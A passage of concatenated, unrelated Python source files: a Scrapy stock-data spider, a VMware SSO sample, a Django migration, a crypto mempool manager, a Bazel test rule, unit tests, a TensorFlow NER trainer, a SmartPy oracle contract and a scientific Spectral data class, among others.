%r", data) except: count_data["formdata"]["code"] = ticker count_data["formdata"]["tradingdate"] = self.date count_data["meta"]["ticker"] = ticker count_data["meta"]["counted"] = "0" req = FormRequest(url=count_data["url"], formdata=count_data["formdata"], headers=count_data["headers"], cookies=count_data["cookies"], meta=count_data["meta"], callback=self.parse, errback=self.handle_error ) if req: yield req self.logger.info( f'Counting number of associates of {ticker}') else: self.logger.info("Request not made from data: %r", data) found += 1 if found: self.logger.debug("Read %s params from '%s'", found, self.redis_key) # Close spider if corpAZ is closed and none in queue and spider is idling # Print off requests with errors, then delete all keys related to this Spider if self.r.get(self.corpAZ_closed_key) == "1" and self.r.llen(self.redis_key) == 0 and self.idling == True: self.logger.info(self.r.smembers(self.error_set_key)) keys = self.r.keys(f'{self.name}*') for k in keys: self.r.delete(k) self.crawler.engine.close_spider( spider=self, reason="CorpAZ is closed; Queue is empty; Processed everything") self.close_status() def make_request_from_data(self, ticker, pageSize): """ Replaces the default method, data is a ticker. """ ctp["formdata"]["code"] = ticker ctp["formdata"]["PageSize"] = pageSize ctp["formdata"]["ToDate"] = self.date ctp["meta"]["ticker"] = ticker ctp["meta"]["counted"] = "1" return FormRequest(url=ctp["url"], formdata=ctp["formdata"], headers=ctp["headers"], cookies=ctp["cookies"], meta=ctp["meta"], callback=self.parse, errback=self.handle_error ) def parse(self, response): if response: ticker = response.meta['ticker'] report_type = response.meta['ReportType'] page = response.meta['page'] counted = int(response.meta['counted']) try: resp_json = json.loads(response.text, encoding='utf-8') if counted == 0: pageSize = int(resp_json) + 1 self.r.lpush(f'{self.name}:tickers', f'{ticker};{pageSize}') self.logger.info(f'CRAWLING {pageSize} COUNTERPARTS OF {ticker}') else: ### Saving local data files # save_jsonfile( # resp_json, filename=f'localData/{self.name}/{ticker}_{self.name}.json') # ES push task handleES_task.delay(self.name.lower(), ticker, resp_json) self.r.srem(self.error_set_key, f'{ticker};{page};{report_type}') self.logger.info(f'CRAWLED COUNTERPARTS OF {ticker}') except: self.logger.info("Response is an empty string") self.r.sadd(self.error_set_key, f'{ticker};{page};{report_type}') """ qwikstart.exceptions ----------------------- All exceptions used in the qwikstart code base are defined here. """ class QwikstartException(Exception): """Base exception class. All qwikstart-specific exceptions should subclass this.""" class RepoLoaderError(QwikstartException): """Exception raised when loading task specification fails.""" # ---------------------- # User-facing exceptions # ---------------------- class UserFacingError(QwikstartException): """Base exception for errors that are meant to be displayed to users.""" class ConfigurationError(UserFacingError): """User-facing exception raised during qwikstart configuration.""" class ObsoleteError(UserFacingError): """User-facing exception raised for obsolete functionality.""" class OperationError(UserFacingError): """User-facing exception raised during execution of operation.""" class OperationDefinitionError(UserFacingError): """Exception raised when an operation is improperly defined.""" class TaskParserError(UserFacingError): """User-facing exception raised when parsing task specification fails.""" from handlers.base_handler import BaseHandler import tornado.web from models import User class UserHandler(BaseHandler): def get(self): user = User.get_username('') count = self.db_session.query(User).count() self.write('{} users so far!'.format(count)) class UserDetailHandler(tornado.web.RequestHandler): def get(self, user_id): self.write('user id: ' + user_id) from distutils.core import setup setup( name = 'syntaxTrees', packages = ['syntaxTrees'], version = '1.0.0', description = '', long_description = '', author = '', author_email = '', license = 'MIT', package_data={ '': ['*.txt'], }, install_requires=[ ], ) samples/vsphere/sso/embedded_psc_sso_workflow.py100-1000 #!/usr/bin/env python """ * ******************************************************* * Copyright (c) VMware, Inc. 2017. All Rights Reserved. * SPDX-License-Identifier: MIT * ******************************************************* * * DISCLAIMER. THIS PROGRAM IS PROVIDED TO YOU "AS IS" WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, WHETHER ORAL OR WRITTEN, * EXPRESS OR IMPLIED. THE AUTHOR SPECIFICALLY DISCLAIMS ANY IMPLIED * WARRANTIES OR CONDITIONS OF MERCHANTABILITY, SATISFACTORY QUALITY, * NON-INFRINGEMENT AND FITNESS FOR A PARTICULAR PURPOSE. """ __author__ = 'VMware, Inc.' __vcenter_version__ = '6.0+' from vmware.vapi.vsphere.client import create_vsphere_client from com.vmware.cis.tagging_client import (Category, CategoryModel) from samples.vsphere.common import sample_cli from samples.vsphere.common import sample_util from samples.vsphere.common import sso from samples.vsphere.common.ssl_helper import get_unverified_context from samples.vsphere.common.ssl_helper import get_unverified_session class EmbeddedPscSsoWorkflow(object): """ Demonstrates how to Login to vCenter vAPI service with embedded Platform Services Controller. """ def __init__(self): parser = sample_cli.build_arg_parser() self.args = sample_util.process_cli_args(parser.parse_args()) def run(self): print('\n\n#### Example: Login to vCenter server with ' 'embedded Platform Services Controller') # Since the platform services controller is embedded, the sso server # is the same as the vCenter server. sso_url = 'https://{}/sts/STSService'.format(self.args.server) print('\nStep 1: Connect to the Single Sign-On URL and ' 'retrieve the SAML bearer token.') authenticator = sso.SsoAuthenticator(sso_url) context = None if self.args.skipverification: context = get_unverified_context() bearer_token = authenticator.get_bearer_saml_assertion( self.args.username, self.args.password, delegatable=True, ssl_context=context) session = get_unverified_session() if self.args.skipverification else None # Connect to vSphere client client = create_vsphere_client(server=self.args.server, bearer_token=bearer_token, session=session) # Create and Delete TagCategory to Verify connection is successful print('\nStep 3: Creating and Deleting Tag Category...\n') create_spec = client.tagging.Category.CreateSpec() create_spec.name = 'TestTag_embeded_psc_sso_workflow' create_spec.description = 'TestTagDesc' create_spec.cardinality = CategoryModel.Cardinality.MULTIPLE create_spec.associable_types = set() category_id = client.tagging.Category.create(create_spec) assert category_id is not None print('Tag category created; Id: {0}\n'.format(category_id)) # Delete TagCategory client.tagging.Category.delete(category_id) def main(): embedded_psc_sso_workflow = EmbeddedPscSsoWorkflow() embedded_psc_sso_workflow.run() # Start program if __name__ == '__main__': main() andrewbird2/django-data-validation # Generated by Django 3.0.8 on 2020-07-23 18:32 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='CReturnValues', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('foobar', models.PositiveIntegerField(blank=True, null=True)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='IReturnValues', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('foobar', models.PositiveIntegerField(blank=True, null=True)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Parent', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('foobar', models.PositiveIntegerField(blank=True, null=True)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='RelatedFields', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ], ), migrations.CreateModel( name='TestModel', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('foobar', models.PositiveIntegerField(blank=True, null=True)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='ExcludedModel', fields=[ ('parent_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='app1.Parent')), ], options={ 'abstract': False, }, bases=('app1.parent',), ), migrations.CreateModel( name='Relation', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('foobar', models.PositiveIntegerField(blank=True, null=True)), ('fkey', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='app1.RelatedFields')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='RelatedFieldsM2M', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('rf', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='app1.RelatedFields')), ('rl', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='app1.Relation')), ], ), migrations.AddField( model_name='relatedfields', name='fkey', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='fkey_relation', to='app1.Relation'), ), migrations.AddField( model_name='relatedfields', name='m2m', field=models.ManyToManyField(through='app1.RelatedFieldsM2M', to='app1.Relation'), ), migrations.AddField( model_name='relatedfields', name='o2o', field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='o2o_relation', to='app1.Relation'), ), migrations.CreateModel( name='ProxyModel', fields=[ ], options={ 'proxy': True, 'indexes': [], 'constraints': [], }, bases=('app1.parent',), ), migrations.CreateModel( name='ModelWithExcludedParent', fields=[ ('excludedmodel_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='app1.ExcludedModel')), ], options={ 'abstract': False, }, bases=('app1.excludedmodel',), ), ] MasterFrumma/leerleer/core/storage/mempool_tx.py from leer.core.primitives.transaction_skeleton import TransactionSkeleton from leer.core.lubbadubdub.transaction import Transaction from leer.core.utils import ObliviousDictionary from leer.core.primitives.block import generate_block_template, build_tx_from_skeleton from leer.core.parameters.dynamic import next_reward from leer.core.parameters.constants import coinbase_maturity from leer.core.lubbadubdub.ioput import IOput class MempoolTx: #Should be renamed to Mempool since it now holds block_template info ''' This manager holds information about known unconfirmed transaction and provides it for generation of next block and relay, also it holds (unsolved) block templates. self.transactions contains skeletons of known transactions (before merging) self.current_set containt transactions which are 1) downloaded and 2) do not contradict with each other self.short_memory_of_mined_transaction contains transactions which were mined in the last few blocks (we include tx to short_memory_of_mined_transaction if all tx.inputs and tx.outputs were in block_tx). It is necessary for safe rollbacks without losing transactions. ''' def __init__(self, storage_space): self.transactions = [] self.built_tx = {} self.current_set = [] self.combined_tx = None self.short_memory_of_mined_transaction = {} self.storage_space = storage_space self.storage_space.register_mempool_tx(self) self.block_templates = ObliviousDictionary(sink_delay=6000) self.key_manager = None def update_current_set(self): ''' For now we have quite a simple and dirty algo: 1) sort all tx by input_num (bigger first) 2) iterate through tx and add transactions to current_set if a) it is downloaded b) it is valid (otherwise delete from self.transactions) c) doesn't contradict with any other tx in the set ''' self.transactions = sorted(self.transactions, key = lambda x: len(x.input_indexes), reverse=True) tx_to_remove_list = [] txos_storage = self.storage_space.txos_storage merged_tx = Transaction(txos_storage=txos_storage) for tx_skeleton in self.transactions: #TODO build_tx_from_skeleton should raise distinctive exceptions downloaded = True for _i in tx_skeleton.input_indexes: if not _i in txos_storage.confirmed: downloaded = False for _o in tx_skeleton.output_indexes: if not _o in txos_storage.mempool: downloaded = False if not downloaded: continue try: if tx_skeleton.serialize() in self.built_tx: full_tx = self.built_tx[tx_skeleton.serialize()] else: if tx_skeleton.tx: full_tx = tx_skeleton.tx else: full_tx = build_tx_from_skeleton(tx_skeleton, self.storage_space.txos_storage, self.storage_space.blockchain.current_height +1) tx_skeleton.tx=full_tx self.built_tx[tx_skeleton.serialize()]=full_tx except Exception as e: tx_to_remove_list.append(tx_skeleton) continue try: merged_tx = merged_tx.merge(full_tx) self.current_set.append(tx_skeleton) except: pass #it is ok for tx in tx_to_remove_list: self.transactions.remove(tx) self.built_tx.pop(tx.serialize(), None) self.combined_tx = merged_tx def update(self, reason): self.update_current_set() def give_tx(self): return self.combined_tx def give_tx_skeleton(self): return TransactionSkeleton(tx = self.combined_tx) def add_tx(self,tx): if isinstance(tx, Transaction): tx_skel = TransactionSkeleton(tx=tx) self.built_tx[tx_skel.serialize()]=tx self.transactions.append(tx_skel) elif isinstance(tx,TransactionSkeleton): self.transactions.append(tx) else: raise self.update(reason="Tx addition") def set_key_manager(self, key_manager): self.key_manager = key_manager def give_block_template(self): if not self.key_manager: raise Exception("Key manager is not set") value = next_reward(self.storage_space.blockchain.current_tip, self.storage_space.headers_storage) coinbase = IOput() coinbase.fill(self.key_manager.new_address(), value, relay_fee=0, coinbase=True, lock_height=self.storage_space.blockchain.current_height + 1 + coinbase_maturity) coinbase.generate() self.storage_space.txos_storage.mempool[coinbase.serialized_index]=coinbase tx=Transaction(txos_storage = self.storage_space.txos_storage, key_manager= self.key_manager) tx.add_coinbase(coinbase) tx.compose_block_transaction() block = generate_block_template(tx, self.storage_space) self.add_block_template(block) return block def add_block_template(self, block): self.block_templates[block.header.template] = block def get_block_by_header_solution(self, header): if not header.template in self.block_templates: raise Exception("Unknown template") block = self.block_templates[header.template] block._header = header return block #This block is already ready to be added to blockchain (PoW is not checked, though) 0 # Copyright 2017 The Bazel Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """A wrapper around container structure tests for Bazel. This rule feeds a built image and a set of config files to the container structure test framework." """ load( "//container:bundle.bzl", "container_bundle", ) def _impl(ctx): if len([x for x in [ctx.attr.image, ctx.file.image_tar, ctx.file.image_config] if x]) != 1: fail("Exactly one of 'image', 'image_tar', 'image_config' must be specified") args = ["test", "--driver", ctx.attr.driver] if ctx.file.image_tar: # no need to load if we're using raw tar load_statement = "" args += ["--image", ctx.file.image_tar.short_path] runfiles = ctx.runfiles( files = [ctx.executable._structure_test, ctx.file.image_tar] + ctx.files.configs, ) elif ctx.file.image_config: load_statement = "" args += ["--metadata", ctx.file.image_config.short_path, "--force", True] runfiles = ctx.runfiles( files = [ctx.executable._structure_test, ctx.file.image_config] + ctx.files.configs, ) else: load_statement = "%s --norun" % ctx.executable.image.short_path args += ["--image", ctx.attr.loaded_name] runfiles = ctx.runfiles( files = [ctx.executable._structure_test, ctx.executable.image] + ctx.files.configs, transitive_files = ctx.attr.image[DefaultInfo].files, ).merge(ctx.attr.image[DefaultInfo].data_runfiles) if not ctx.attr.verbose: args += ["--quiet"] for c in ctx.files.configs: args += ["--config", c.short_path] # Generate a shell script to execute structure_tests with the correct flags. ctx.actions.expand_template( template = ctx.file._structure_test_tpl, output = ctx.outputs.executable, substitutions = { "%{args}": " ".join(args), "%{load_statement}": load_statement, "%{test_executable}": ctx.executable._structure_test.short_path, }, is_executable = True, ) return [DefaultInfo(runfiles = runfiles)] _container_test = rule( attrs = { "configs": attr.label_list( mandatory = True, allow_files = True, ), "driver": attr.string( default = "docker", doc = "Driver to use when running structure tests. Valid values are docker, host and tar", mandatory = False, values = [ "docker", "host", "tar", ], ), "image": attr.label( doc = "When using the docker driver, label of the incremental loader", executable = True, cfg = "target", ), "image_config": attr.label( doc = "When using the host driver, label of the container metadata file", allow_single_file = [".json", ".yaml", ".yml"], ), "image_tar": attr.label( doc = "When using the tar driver, label of the container image tarball", allow_single_file = [".tar"], ), "loaded_name": attr.string( doc = "When using the docker driver, the name:tag of the image when loaded into the docker daemon", ), "verbose": attr.bool( default = False, mandatory = False, ), "_structure_test": attr.label( default = Label("//contrib:structure_test_executable"), cfg = "target", executable = True, allow_files = True, ), "_structure_test_tpl": attr.label( default = Label("//contrib:structure-test.sh.tpl"), allow_single_file = True, ), }, executable = True, test = True, toolchains = ["@io_bazel_rules_docker//toolchains/docker:toolchain_type"], implementation = _impl, ) def container_test(name, image, configs, driver = None, verbose = None, **kwargs): """Renames the image under test before threading it to the container test rule. See also https://github.com/GoogleContainerTools/container-structure-test Args: name: The name of this container_test rule image: The image to use for testing configs: List of YAML or JSON config files with tests driver: Driver to use when running structure tests verbose: Turns on/off verbose logging. Default False. **kwargs: Attrs to pass through """ image_loader = None image_tar = None image_config = None loaded_name = None if driver == "tar": image_tar = image + ".tar" elif driver == "host": image_config = image + ".json" else: # Give the image a predictable name when loaded image_loader = "%s.image" % name # Remove commonly encountered characters that Docker will choke on. # Include the package name in the new image tag to avoid conflicts on naming # when running multiple container_test on images with the same target name # from different packages. sanitized_name = (native.package_name() + image).replace(":", "").replace("@", "").replace("/", "") loaded_name = "%s:intermediate" % sanitized_name container_bundle( name = image_loader, images = { loaded_name: image, }, ) _container_test( name = name, loaded_name = loaded_name, image = image_loader, image_tar = image_tar, image_config = image_config, configs = configs, verbose = verbose, driver = driver, **kwargs ) from splitwise import Splitwise import unittest try: from unittest.mock import patch except ImportError: # Python 2 from mock import patch @patch('splitwise.Splitwise._Splitwise__makeRequest') class GetCurrenciesTestCase(unittest.TestCase): def setUp(self): self.sObj = Splitwise('consumerkey', 'consumersecret') def test_getCurrencies_success(self, mockMakeRequest): mockMakeRequest.return_value = '{"currencies":[{"currency_code":"AED","unit":"DH"},{"currency_code":"AFN","unit":"Afs"},{"currency_code":"ALL","unit":"L"}]}' # noqa: E501 currencies = self.sObj.getCurrencies() mockMakeRequest.assert_called_with( "https://secure.splitwise.com/api/v3.0/get_currencies") self.assertEqual(len(currencies), 3) self.assertEqual(currencies[0].getCode(), "AED") self.assertEqual(currencies[0].getUnit(), "DH") self.assertEqual(currencies[1].getCode(), "AFN") self.assertEqual(currencies[1].getUnit(), "Afs") self.assertEqual(currencies[2].getCode(), "ALL") self.assertEqual(currencies[2].getUnit(), "L") def test_getCurrencies_exception(self, mockMakeRequest): mockMakeRequest.side_effect = Exception( "Invalid response %s. Please check your consumer key and secret." % 404) with self.assertRaises(Exception): self.sObj.getCurrencies() mockMakeRequest.assert_called_with( "https://secure.splitwise.com/api/v3.0/get_currencies") """User models.""" import secrets from datetime import datetime, timedelta from marshmallow import Schema, fields from marshmallow.validate import Length from muckr_api.extensions import bcrypt from muckr_api.extensions import database as db class User(db.Model): __tablename__ = "users" id = db.Column(db.Integer, primary_key=True) username = db.Column(db.String(64), index=True, unique=True) email = db.Column(db.String(120), index=True, unique=True) password_hash = db.Column(db.String(128)) token = db.Column(db.String(64), index=True, unique=True) token_expiration = db.Column(db.DateTime) is_admin = db.Column(db.Boolean, default=False) artists = db.relationship("Artist", backref="user", lazy="dynamic") venues = db.relationship("Venue", backref="user", lazy="dynamic") def __repr__(self): return "".format(self.username) def set_password(self, password): data = bcrypt.generate_password_hash(password) self.password_hash = data.decode("utf-8") def check_password(self, password): return bcrypt.check_password_hash(self.password_hash, password) def get_token(self, expires_in=3600): now = datetime.utcnow() if self.token and self.token_expiration > now + timedelta(seconds=60): return self.token self.token = secrets.token_hex(32) self.token_expiration = now + timedelta(seconds=expires_in) db.session.add(self) return self.token def revoke_token(self): if self.token is not None: self.token_expiration = datetime.utcnow() - timedelta(seconds=1) @staticmethod def check_token(token): user = User.query.filter_by(token=token).first() if ( user is not None and user.token_expiration is not None and user.token_expiration > datetime.utcnow() ): return user class UserSchema(Schema): id = fields.Integer(dump_only=True) username = fields.Str(required=True, validate=Length(min=1)) email = fields.Email(required=True) password = fields.Str(load_only=True, required=True) jbauermanncode/Curso_Em_Video_PythonPython_Exercicios/Mundo2/Condições em Python (if..elif)/python_037.py ''' Escreva um programa em Python que leia um número inteiro qualquer e peça para o usuário escolher qual será a base de conversão: 1 para binário, 2 para octal e 3 para hexadecimal. ''' # Ler um número inteiro e definr a base n = int(input('Digite um número: ')) base = int(input('Em qual base será feita a conversão? ')) print('[1] Para Binário') print('[2] Para Octal') print('[3] Para Hexadecimal') # Conversão para binário, hexadecimal, octal, com Estrutura Condicional if, elif, else. if base == 1: print('O número {}, fica {} em binário.'.format(n, bin(n)[2:])) elif base == 2: print('O número {}, fica {} em octal.'.format(n, oct(n)[2:])) elif base == 3: print('O número {}, fica {} em hexadecimal.'.format(n, hex(n)[2:])) else: print('O número de base não está listado')import random def power(base , pow): answer = 1 for index in range(pow): answer = answer * base return answer def percentage(value , total): percentage = (value / total) * 100 return percentage10-100 import os import tensorflow as tf from tensorflow.python.keras.layers import ( Embedding, Bidirectional, LSTM, BatchNormalization, ) from tensorflow.python.keras.models import Sequential from ioflow.configure import read_configure from ioflow.corpus import get_corpus_processor from seq2annotation.input import generate_tagset, Lookuper, index_table_from_file from seq2annotation.trainer.keras_utils import export_as_deliverable_model from seq2annotation.utils import create_dir_if_needed, create_file_dir_if_needed from tf_attention_layer.layers.global_attentioin_layer import GlobalAttentionLayer from tf_crf_layer.layer import CRF from tf_crf_layer.loss import ConditionalRandomFieldLoss from tf_crf_layer.metrics import SequenceCorrectness, SequenceSpanAccuracy from deliverable_model.builtin.converter.identical_converters import ( ConverterForRequest, ConverterForResponse, ) from tokenizer_tools.tagset.converter.offset_to_biluo import offset_to_biluo # tf.enable_eager_execution() def main(): config = read_configure() corpus = get_corpus_processor(config) corpus.prepare() train_data_generator_func = corpus.get_generator_func(corpus.TRAIN) eval_data_generator_func = corpus.get_generator_func(corpus.EVAL) corpus_meta_data = corpus.get_meta_info() tags_data = generate_tagset(corpus_meta_data["tags"]) train_data = list(train_data_generator_func()) eval_data = list(eval_data_generator_func()) tag_lookuper = Lookuper({v: i for i, v in enumerate(tags_data)}) vocab_data_file = config.get("vocabulary_file") if not vocab_data_file: # load built in vocabulary file vocab_data_file = os.path.join( os.path.dirname(__file__), "../data/unicode_char_list.txt" ) print("using default data file: {}".format(vocab_data_file)) else: print("using custom vocab data file: {}".format(vocab_data_file)) vocabulary_lookuper = index_table_from_file(vocab_data_file, config.get("vocabulary_config", {})) def preprocss(data, maxlen): raw_x = [] raw_y = [] for offset_data in data: tags = offset_to_biluo(offset_data) words = offset_data.text tag_ids = [tag_lookuper.lookup(i) for i in tags] word_ids = [vocabulary_lookuper.lookup(i) for i in words] raw_x.append(word_ids) raw_y.append(tag_ids) if maxlen is None: maxlen = max(len(s) for s in raw_x) print(">>> maxlen: {}".format(maxlen)) x = tf.keras.preprocessing.sequence.pad_sequences( raw_x, maxlen, padding="post" ) # right padding # lef padded with -1. Indeed, any integer works as it will be masked # y_pos = pad_sequences(y_pos, maxlen, value=-1) # y_chunk = pad_sequences(y_chunk, maxlen, value=-1) y = tf.keras.preprocessing.sequence.pad_sequences( raw_y, maxlen, value=0, padding="post" ) return x, y MAX_SENTENCE_LEN = config.get("max_sentence_len", 25) train_x, train_y = preprocss(train_data, MAX_SENTENCE_LEN) test_x, test_y = preprocss(eval_data, MAX_SENTENCE_LEN) EPOCHS = config["epochs"] EMBED_DIM = config["embedding_dim"] USE_ATTENTION_LAYER = config.get("use_attention_layer", False) BiLSTM_STACK_CONFIG = config.get("bilstm_stack_config", []) BATCH_NORMALIZATION_AFTER_EMBEDDING_CONFIG = config.get( "use_batch_normalization_after_embedding", False ) BATCH_NORMALIZATION_AFTER_BILSTM_CONFIG = config.get( "use_batch_normalization_after_bilstm", False ) CRF_PARAMS = config.get("crf_params", {}) vacab_size = vocabulary_lookuper.size() tag_size = tag_lookuper.size() model = Sequential() model.add( Embedding(vacab_size, EMBED_DIM, mask_zero=True, input_length=MAX_SENTENCE_LEN) ) if BATCH_NORMALIZATION_AFTER_EMBEDDING_CONFIG: model.add(BatchNormalization()) for bilstm_config in BiLSTM_STACK_CONFIG: model.add(Bidirectional(LSTM(return_sequences=True, **bilstm_config))) if BATCH_NORMALIZATION_AFTER_BILSTM_CONFIG: model.add(BatchNormalization()) if USE_ATTENTION_LAYER: model.add(GlobalAttentionLayer()) model.add(CRF(tag_size, name="crf", **CRF_PARAMS)) # print model summary model.summary() callbacks_list = [] tensorboard_callback = tf.keras.callbacks.TensorBoard( log_dir=create_dir_if_needed(config["summary_log_dir"]) ) callbacks_list.append(tensorboard_callback) checkpoint_callback = tf.keras.callbacks.ModelCheckpoint( os.path.join(create_dir_if_needed(config["model_dir"]), "cp-{epoch:04d}.ckpt"), load_weights_on_restart=True, verbose=1, ) callbacks_list.append(checkpoint_callback) metrics_list = [] metrics_list.append(SequenceCorrectness()) metrics_list.append(SequenceSpanAccuracy()) loss_func = ConditionalRandomFieldLoss() # loss_func = crf_loss model.compile("adam", loss={"crf": loss_func}, metrics=metrics_list) model.fit( train_x, train_y, epochs=EPOCHS, validation_data=[test_x, test_y], callbacks=callbacks_list, ) # Save the model model.save(create_file_dir_if_needed(config["h5_model_file"])) tf.keras.experimental.export_saved_model( model, config["saved_model_dir"] ) export_as_deliverable_model( create_dir_if_needed(config["deliverable_model_dir"]), keras_saved_model=config["saved_model_dir"], converter_for_request=ConverterForRequest(), converter_for_response=ConverterForResponse(), vocabulary_lookup_table=vocabulary_lookuper, tag_lookup_table=tag_lookuper, padding_parameter={"maxlen": MAX_SENTENCE_LEN, "value": 0, "padding": "post"}, addition_model_dependency=["tf-crf-layer"], custom_object_dependency=["tf_crf_layer"], ) if __name__ == "__main__": main() 0 #!/usr/bin/env python # coding=utf-8 from django.conf.urls import url from . import views app_name = 'polls' urlpatterns = [ url(r'^$', views.IndexView.as_view(), name='index'), ] import setuptools as ok with open('README.md') as f: urmom = f.read() ok.setup( author="https://hentaihaven.dev/", author_email="", name='hentaihavendev', license="MIT", description='an api wrapper for https://api.hentaihaven.dev/', version='v0.1', long_description=urmom, url='https://github.com/unsecuring/hentaihavendev', packages=ok.find_packages(where="hentaihavendev"), install_requires=['requests'], package_dir={"": "hentaihavendev"}, )def foo3(x, y): i = x + y return i s = """ .a.fy int z """ from fython.test import * # shell('rm -rf a/ a.* b.*') # writer(s) w = load('.a', release=1, verbose=0, run_main=0) print(open(w.module.url.fortran_path, 'r').read()) s = """ .b.fy import .a(*) print '{:z}' """ # writer(s) w = load('.b', release=1, verbose=0, run_main=0) print(open(w.module.url.fortran_path, 'r').read()) oro-contract/btcusd-oracle-contract.py import smartpy as sp class BitcoinToCurrencyDataOracle(sp.Contract): def __init__(self, admin): self.init(conversionData = sp.map(tkey = sp.TString, tvalue = sp.TRecord(buy=sp.TInt,sell=sp.TInt)), keysset = sp.set([admin]) , owner = admin) @sp.entry_point def feedData(self,params): sp.if (self.data.keysset.contains(sp.sender)): self.data.conversionData[params.currency] = sp.record(buy = params.buy, sell = params.sell) @sp.entry_point def addDataContributor(self,params): sp.if sp.sender == self.data.owner: self.data.keysset.add(params.contributor) @sp.entry_point def getDataFromOrO(self,params): errcd = sp.record(buy = 0,sell=0) contract = sp.contract(sp.TRecord(buy = sp.TInt, sell = sp.TInt),sp.sender,entry_point = "receiveDataFromOrO").open_some() sp.if sp.amount == sp.mutez(5000): sp.transfer(self.data.conversionData[params.currency],sp.mutez(0),contract) sp.else: sp.transfer(errcd,sp.amount,contract) @sp.add_test(name="BTCUSDTest") def test(): scenario = sp.test_scenario() oracle = BitcoinToCurrencyDataOracle(sp.address('tz1beX9ZDev6SVVW9yJwNYA89362ZpWuDwou')) scenario += oracle scenario += oracle.feedData(currency = "USD", buy = 7098 , sell = 7097).run(sender=sp.address('tz1beX9ZDev6SVVW9yJwNYA89362ZpWuDwou')) scenario += oracle.feedData(currency = "INR", buy = 545791 , sell = 545791).run(sender=sp.address('tz1-AAA')) scenario += oracle.addDataContributor(contributor=sp.address("tz1-AAA")).run(sender=sp.address('tz1beX9ZDev6SVVW9yJwNYA89362ZpWuDwou')) scenario += oracle.feedData(currency = "INR", buy = 545791 , sell = 545791).run(sender=sp.address('tz1-AAA')) scenario += oracle.getDataFromOrO(currency = "INR").run(sender=sp.address("KT1-AAA") , amount = sp.mutez(5000)) scenario += oracle.getDataFromOrO(currency = "INR").run(sender=sp.address("KT1-BBB") , amount = sp.mutez(4000)) """ The test a == b is evaluated O(n2) times. The rest of the time spent depends upon how many matching (a,b) pairs exist. As we have noted, there are at most n such pairs, and so the management of the loop over C, and the commands within the body of that loop, use at most O(n2) time. """ # Overall complexity: O(n ** 2) def disjoint2(A, B, C): for a in A: for b in B: if a == b: for c in C: # O(n**2) not n ** 3 if a == c: return False return True if __name__ == "__main__": a = {1, 2, 3} b = {3, 4, 5} c = {5, 6, 7} print("Three sets {}, {}, and {} are disjoint: {}".format(a, b, c, disjoint2(a, b, c)) ) a = {1, 2, 3} b = {3, 2, 5} c = {5, 6, 2} print("Three sets {}, {}, and {} are disjoint: {}".format(a, b, c, disjoint2(a, b, c)) )# coding: utf-8 # Distributed under the terms of the MIT License. import numpy as np from matador.utils.cell_utils import real2recip, frac2cart from matador.orm.orm import DataContainer class Spectral(DataContainer): """ Note: This class speaks of "k-points" as general reciprocal space points used to display the dispersion curves; these correspond to CASTEP's phonon_kpoints or spectral_kpoints, and not the k-points used to generate the underlying wavefunction or dynamical matrix. """ @property def eigs(self): """ Alias for the correct eigenvalue array. """ if 'Vibrational' in self.__class__.__name__: return self._data['eigs_q'] return self._data['eigs_s_k'] @property def lattice_cart(self): """ The Cartesian lattice vectors of the real space lattice. """ return self._data['lattice_cart'] @property def num_kpoints(self): """ Number of dispersion k-points sampled. """ return self._data['num_kpoints'] @property def num_qpoints(self): """ Alias for number of kpoints. """ return self.num_kpoints @property def projectors(self): """ Return list of projector labels in the format `(element, l-channel)`. """ return self._data.get('projectors') @property def num_modes(self): """ Number of eigenvalues per q/k-point. """ return self._data['num_modes'] @property def num_bands(self): """ Number of eigenvalues per q/k-point. """ if 'Vibrational' in self.__class__.__name__: return self._data['num_modes'] return self._data['num_bands'] @property def projector_weights(self): """ Return the array of projector weights per eigval, with shape (num_projectors, num_kpoints, num_bands). """ return self._data.get('projector_weights') @property def num_projectors(self): """ Return the number of projectors. """ if self.projectors is None: return 0 return len(self.projectors) @property def kpoint_branches(self): """ Return the k-point branches in the older format, which contained a list of lists of continous indices. """ if self._data.get('kpoint_branches') is None: self._data['kpoint_branches'] = self.find_full_kpt_branch() return self._data['kpoint_branches'] @property def kpoint_branch_start(self): """ Return the indices of the start of branches. """ if not self._data.get('kpoint_branch_start'): self.set_branches_and_spacing() return self._data['kpoint_branch_start'] @property def kpoint_path_spacing(self): """ An estimated kpoint spacing. """ if not self._data.get('kpoint_path_spacing'): self.set_branches_and_spacing() return self._data['kpoint_path_spacing'] @property def kpoint_path(self): """ The fractional sampling path in reciprocal space. """ return np.asarray(self._data['kpoint_path']) @property def kpoint_weights(self): if 'kpoint_weights' in self._data: return np.asarray(self._data['kpoint_weights']) return None @property def kpoint_path_cartesian(self): """ The 